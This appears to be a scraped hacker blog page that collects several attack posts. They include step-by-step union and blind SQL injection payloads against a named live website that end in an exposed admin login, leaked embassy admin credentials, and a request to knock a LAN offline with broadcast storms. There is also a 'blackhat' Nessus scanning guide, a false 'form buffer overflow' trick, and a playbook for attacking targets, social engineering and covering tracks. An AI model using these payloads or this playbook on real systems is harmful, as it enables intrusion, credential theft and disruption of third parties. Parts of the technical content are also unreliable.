Pick one of those dorks and add inurl: before it (If they do not already have it) and then copy and paste it into google. Pick one of the sites off google and go to it.

For example the url of the page you are on may look like this http://www.leadacidbatteryinfo.org/newsdetail.php?id=10

To check that it is vulnerable all you have to do is add  '

So our link should look like that :

http://www.leadacidbatteryinfo.org/newsd...php?id=10'

Press enter and you get some kind of error. The errors will vary...

Our page should look like that : (Click to Hide)

After you find your vulnerable site the first step you need to take is to find the number of columns. The easiest way to do this is writing "order by " column number and we add "--" after the number.

Our link should look like that :

http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 15--

If you get an error that means you should lower the number of columns .

Let's try 10.

http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 10--

The page opened normally that means the number of columns is between 10 and 14.

We try now 11.

http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 11--

The page opened normally too...

Let's try 12.

http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 12--

We got error . That means the columns number is 11 because we got error on 12 and 11 opened normally .

Finding Accessible Columns

Now that we have the number of columns we need to get the column numbers that we can grab information from.

We can do that by adding a "-" before the "10" replacing the " order by # " with "union all select " and columns number

Our link should look like that :

http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,8,9,10,11--

We should get numbers .

Our page should look like that : (Click to Hide)

For the end part of the url, (1,2,3,4,5,6,7,8,9,10,11) You put the number of columns you found in the first step. Since I found that the site I was testing had 11 columns, I put 1,2,3,4,5,6,7,8,9,10,11--

These numbers are the colum numbers we can get information from. We will replace them later with something else so write them down if you want.

Getting Database Version

We found that column 8 , 3 , 4 and 5 are vulnerable so we will use them to get the database version .

Why Do We Do That?

If database is under 5 that means we will have to guess the tables names

To do that we need to replace one of the vulnerable columns by "@@verion"

Let's take column 8.

Our link should look like that :

http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,@@version,9,10,11--

In our case we got "5.0.77" its >5 so we can continue.

Now we need to get the table name we want to access :

To do it we need to replace "@@version" with "table_name" and add after the last columns number "from information_schema.tables" and add the "--" in the end .

Link should be like that:

http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,table_name,9,10,11 from information_schema.tables--

Page should look like that

Now we will search the table we want to access .

We should fine something with admin on it and in our case it's tbladmin

Now we need to get the ASCII value of "tbladmin".

What is ASCII?

http://en.wikipedia.org/wiki/ASCII_value

Now to get the ASCII value of "tbladmin" go to that site : http://getyourwebsitehere.com/jswb/text_to_ascii.html

Spoiler (Click to Hide)

Now enter in first box the table name wich is "tbladmin" in our case and click convert to ASCII.

You will get as value that :

Code:

tbladmin

Now remove the characters as & # ; and we add a comma "," between each number .

It should be like that:

Code:

116,98,108,97,100,109,105,110

Now we replace in the URL the "table_name" to "column_name" and change "information_schema.tables" to "information_schema.columns and add "where table_name=char(ASCII value)--

in our case at place of (ASCII value) we put (116,98,108,97,100,109,105,110)--

Our URL should look like that :

http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,column_name,9,10,11 from information_schema.columns where table_name=char(116,98,108,97,100,109,105,110)--

Our page should be like that:

Now we search for the columns named "username" and "password" or something like that .

In our case it is "username" and "password".

Now we can delete most of the URL .

Remove everything after the 11 and add : "from tbladmin" And replace "column_name" with "concat(username,0x3a,password)

0x3a is the ASCII value of a : so we can separate the username from the password.

Our URL should look like t

hat:
http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,concat(username,0x3a,password),9,10,11 from tbladmin

Our page should look like that :

And you're done the username is ishir and password ishir123

Some times password is encrypted with Hashes .

Use my HASH detector to know what it is and decrypt online.

http://www.mediafire.com/?7qd7t6r3b13ccq4

http://adf.ly/cjpJ<---- the password is in it somewhere :)

And We're Done !

I hope you liked my tutorial .

ALL credits go to me !

Thanks for reading that thread.

Read more »

Indian Embassy Of Kathmandu, Nepal Hacked By Ghosts

Indian Embassy Of Kathmandu, Nepal Hacked By Ghosts (A Black Hat Team). They hacked into the database of the website and exposed sensitive information like admin details and many more.

Website:-
http://www.indianembassy.org.np/

user_name:- indianembassy

password:- 147f9d55b079a76d6ec6f36b61f4cf1a

full_name:-  Administrator
        
Login Link:-
http://www.indianembassy.org.np/admin/login.php 

Ambassador Name:-   Jayant Prasad     
Amb_id :- 21 
Last Modification:- 2011-08-27    

Read more »

Creating Broadcast storms to take down a switched Network?

I am willing to Take down a LAN Network with Broadcast storms,

Before that here is the topology of our overall Network





Please have a look at the following image which will represent The network set-up i am talking,

Code:

http://i54.tinypic.com/a32fzn.png
(As the image is large ,I am placing this in code instead of [IMG] tags)



And here is the Information about our LAN 

 Total sub-nets-4



clients-90% of them running windows xp-sp2 and rest running windows 7 and vista.



Servers-each sub-net has a DC i.e server,they are running windows 2003 OS.



Main-server-i.e the 1 that is providing internet access to rest of the
clients and other servers in sub-net 1,2,3,4 running red-hat linux.



And switches used in our networks are un-managed one and our network
does not have any kind of NIDS,HIDS,NIPS,HIPS or any kind of Network
security set-up,..



Traffic or accessing pc's across sub-nets is allowed by the Domain controller,



And LAN or Ethernet speed in a single sub-net is  100 mbps

I am having access in
one of the pc's in sub-net 1 and i have privilege to install
Applications and i am willing to create some kind of Broad-cast storms
to bring down All the sub-nets,I don't know how much traffic i need to
generate to take down this network,Also i am not sure about the right
protocol's and exact Attacking vector to choose ,I heard about ARP
broad-cast storms,but i am not sure about

generating ARP broad-cast across sub-net's ,Also i am not sure about the
switch type,because it is kind of OLD and it is a un-managed one with
no-IP Address for it..



So looking for some ideas and help,hope i will find some help...
           
           
           

---

Raise again and again until lambs become Lion..

Never give up !!!!

           
               

Read more »

Scanning with Nessus

[-- Intro --]

Welcome to the Nessus scanning quick guide. In this guide I'll show you
blackhats how to use Tenable Nessus to scan websites // IP's for
vulnerabilities. For this guide I'll be using http://sugarmegs.org/



[-- Installing Nessus --]

For this tutorial I'll be using a Windows 7 machine, instead of my
normal Linux, because the free version works a lot better on Windows.
Now to the actual installing part. Step one, obtaining Nessus. To
download Nessus, visit http://www.nessus.org/download/ and download it. Then install it like you'd install any other program.



[-- Setting up --]

Now to set up your Nessus server. Open the Nessus Server Manager that
should be on your desktop(If its not look on C:\Program
Files\Tenable\Nessus for it)

Once you have that open, update your plugins. If "Allow remote users to
connect to this Nessus server" is unchecked, check it. Now hit the
"Manage users button". Click the + symbol, and fill in the Username,
Password and make it Administrator. Now just save that user and close
that dialog box and start the Nessus server(This may take a couple
seconds)



[-- Logging in --]

Now to log into the Nessus interface. Just click on the Nessus Client on
your desktop, or go to https://localhost:8834/ (This should be the
default)

Now log in with your new credentials for that new user you added. You should end up on that Nessus interface.



[-- Adding a policy --]

A policy will be used to scan the target with plugins used by Nessus.
Click the policy tab and add a new one. Click safe checks box to make
sure your scan doesn't DoS or harm the target in any way, then click
next. Fill in any optional info you may need in this window such as
credentials, and select next. The next box is for the plugins. I prefer
to add all, but you can sift through them to choose any you want. Next,
type a username and password for database settings, and click submit.
Congrats, you've made a policy for scanning.



[-- Scanning --]

Now to actually scan the target for vulnerabilities. Go to your desktop
and make a new text document, and add the IP of the site. The IP for
SugarMegs is 69.38.143.62. Just add the IP and save the file. Now go to
the scans tab and hit Add. Type any name in the Name field. I'm just
gonna make it "Sugar". For Type, hit run now. Policy is gonna be your
new policy you've made. Hit browse for the IP file and navigate to that
text document, and hit upload. Now, just hit launch scan and let it run.
I recommend going to the reports tab and double clicking your current
scan to see how its going.



[-- Now what? --]



Once your done scanning, you can exploit it. Double click on the scan
and hit "Download Report". In the dropdown box, you can select a few
things. For an html detailed report, hit Detailed HTML report(By
finding). If you want to add it to Metasploit to autopwn it, save it as
.nessus









Enjoy your scanning ;)

-----------------------

Read more »

Mini Password Buffer Overflow Tut

Password Form Buffer Overflows

• In this Lesson we will be learning how to do a Login/Password Form Buffer Overflow. This is a very basic version of a Buffer Overflow but just as effective. Basically what is happening here is that Password Forms usually have a limit on the number of Characters they are aloud input, but we will bypass this limit overloading the login and getting access to the Server!

• To do this we will need a tool call WebDeveloper for Firefox, which you can download here

• This is a very simple Hack so it only works on some Basic Authentication Logins, but its good know for the future if you find any!   So on firefox Go Tools>Web Developer>Forms>Remove Maximum Lengths Now type in a massively long code eg "aaaaaaaaaaaaaaaaaaaaaaaaa" and so on, and it should come up with an error page either showing the encrypted passwords, or clear text passwords on the server! 

Congratulations now you know a simple Form Buffer Overflow!

This tutorial is Written 100% by Lethalcode

Read more »

Blind SQL Injections ★★★

Step 1 Finding Vulnerabilities



Well, as you know from my first tutorial, a vulnerable website has security holes. Therefore we will take this test website:


Code:

site.com/index.php?id=1


To find out if it's vulnerable we will undergo a little test.

For that we will add some strings. As everybody knows the number 1 is equal to 1. But not to 2.

Therefore we will compare these two websites:


Code:

site.com/index.php?id=1 and 1=1

and

site.com/index.php?id=1 and 1=2


If "and 1=1" loads perfectly, but "1=2" is missing some content, the website is vulnerable.

However, if they both load without missing content, it is not vulnerable.



Step 2 Finding The Mysql Version



This isn't very much of use in this kind of injection, but it might be useful.

To find it out, you'll have to 'guess' the version.

It's either 4 or 5.

To find it out do this:


Code:

site.com/index.php?id=1 and substring(@@version,1,1)=5

or

site.com/index.php?id=1 and substring(@@version,1,1)=4
If one of them is loading without missing any content, it's that version.

(You can do the same with the database name and user)



Step 3 Guessing The Table Names.



As you can see guessing is important in

blind

sqli. That's also needed for the table and it's columns :p

To get the right table you'll have to guess it this way:

Quote:site.com/index.php?id=1 and (select 1 from insert table here limit 0,1)=1
Insert your guessed table in the underlined part. If the website is loading without content missing, then the table exists.



Suppose we've got this:


Code:

site.com/index.php?id=1 and (select 1 from admin limit 0,1)=1


Step 4 Guessing The Columns In A Table.



We will now guess the columns in this certain table (example = admin).



Do this:

Quote:site.com/index.php?id=1 and (select substring(concat(1,guessed column),1,1) from table limit 0,1)=1


This is an example:


Code:

site.com/index.php?id=1 and (select substring(concat(1,username),1,1) from admin limit 0,1)=1


Suppose we've found a username and a password column in the table admin.



Step 5 Extracting Information From The Columns



Note: You can do the same with some tools.

But I prefer to do it manually.



For this we have to put the syntax in ascii and guess it's char.

Note that each time you'll do this, you'll get 1 letter.



Do this:

Quote:site.com/index.php?id=1 and ascii(substring((select concat(column 1,0x3a,column 2) from table limit 0,1),1,1))>char number


Suppose that we've guessed 70. The website then loads normally. That means that the number must be higher.

Keep guessing until the website will load with some content missing.

So that means the first number that would load false after a number that would load true, is the right char.



Suppose that it's 85.



The example would be:


Code:

site.com/index.php?id=1 and ascii(substring((select concat(username,0x3a,password) from admin limit 0,1),1,1))>85


To get the first letter of username:password you'll have to use a asscii table.

Here is one: http://www.asciitable.com/index/asciifull.gif

Navigate to the found char (which is "dec" in the ascii table) and lookup the "chr".



That means that the char from the example (85) is the capital letter U.



To find the 2nd letter and higher you will have to change the underlined number in the syntax:

Quote:site.com/index.php?id=1 and ascii(substring((select concat(username,0x3a,password) from admin limit 1,1),1,1))>(char)

change to

site.com/index.php?id=1 and ascii(substring((select concat(username,0x3a,password) from admin limit 2,1),1,1))>(char)

site.com/index.php?id=1 and ascii(substring((select concat(username,0x3a,password) from admin limit 3,1),1,1))>(char)



etc.


You'll notice when you'll get to the end when (number),1 isn't giving any information anymore.



Suppose we've now found that the username:password = UserAdmin:BagelJuice



--



Outro



Thank you very much for reading this tutorial. If there are any
questions, or you feel like I forgot something, please don't mind to
post it here.

Also please report any grammatical errors, as I try to dodge them.



I hope I helped you with this thread

Read more »

Hacking - Start to finish (quick list)

Hello, this little post will explain in rough details how you start hacking a specific target.

First. There are  many different ways going about this, but this is one way.

Information gathering
The
first thing you want to do when targeting a specific target is get as
much information as possible before a front attack(if any, being quiet
is much better)
Now this step can take ages if you really want a
detailed level of knowledge. And if you are serious about hacking your
target, you should be detailed here.
What sort of information do I
look for you might ask yourself? Well, anything really. Anything
surrounding the target and even things that surround things that
surround your target. Here is a short list of things that might be
useful;

• IP(s), some machines/domains/systems or whatever have multiple domains
• ISP(s), if small ISP(s), get owner details here as below
• Owner. Email, name, location, family, hobby's, Facebook account, phone number
• *Open ports. On ALL of the ips/servers if there are multiple
• Service signatures, find out as much as possible about all the open ports, are they in use? What software are they running at the other end? Do the services reveal any other information about the system? OS? Internal IPS?
• Hosters(In most cases there will be a hosting company)
• Hosters information - Owner and all of that(If the company is small)
• Hosters member system, how does the members login? Is there a login? Is there a forgot password function? Can you exploit the hoster instead?(might be easier in some cases)
• DNS records(if any), subdomains? Hidden domains/info? DNS hosters? Same as above.
• The physical server(s) location / datacenter

And the list goes on and on and on. Literally EVERYTHING about the company/system/server/target are relevant. The more info you got, the easier it will be attacking him/her/them/it. You should decide if you want to target the system or the people of your target. That is, code/system flaws or human flaws(keyloggers, Trojans, social engineering, info gathering + password guessing, etc). This decision should depend on the information you find about your target. Both can be tried ofcourse, just make sure the target does not know you are trying to hack it, often one of the attempts will set off alerts. This whole information gathering part might seem unnecessary, but really. Its neat, lets you put things in perspective so you can find the best point of entry. The attack Before an attack is lunched, there are a few things you need to think about. Here is a list of things you should think about;

• Will this company/target rage crazy if I hack them? If so, check 3rd point.
• Will police or other agencies be contacted if I hack them? If so, check 3rd point.
• *Is my privacy good enough? Are you behind a proxy(s)? Should you? Do the proxy log?(It shouldn't)
• Are they running any services at all? If not, you don't really have any virtual way in..
• Are they running web applications? These are typically easier to hack than services. And have a higher percentage rate of flaws.
• Do the target got a open router/switch/modem system? This often happens with home computers/networks.
• Are your target running platforms with logins? These could be targeted.
• Do you have enough time? Its a good practice to have time enough to do the entire attack in one go. Else you might fire off warnings for the target, and he can go into a bombshelter We don't want that now, do we?

Now there are tree ways of attacking in this guide.
- Service/software exploitation
- Web application exploitation
- Human factor exploitation


Service/software exploitation
Here
you will exploit one or more services/programs running on the target
system. In most cases, this will be called bufferoverflow. This can do
everything from bypassing a login to give you instant shell access. In
scenarios where the target is running services which is not a web
server(can be tho) this might be the way to go.

Web application exploitation
This
is without a doubt the most vulnerable field. Web applications are
flawfull, 70% or so of all pages got some sort of web application flaw,
this ofc may vary from an stupid XSS to a serious RFI. In scenarios
where the target system are running a web server, this is the first
thing to check. Do always check web applications before going on to
service exploitation if you just want to get the target hacked.

Human factor exploitation
Now
if all other things fail, there is ALWAYS a human factor. This can be
social engineering the target to give you limited access, and you work
your way up from there. Or simply tricking the target to trust you and
in some strange way share his password, perhaps not for the system you
are targeting, but for his email or an online account or whatever,
stupid people tend to use the same password or the same password syntax
everywhere. Keep in mind that the human factor doesn't necessarily have
to be your targets owner, could be the hoster, the DNS hoster, the ISP,
family.


Finale note
If you think its
necessary, clear your tracks. If you ask me, if you can see that you
have been there you didn't do it right. Take care, be safe.

-----------------------

Read more »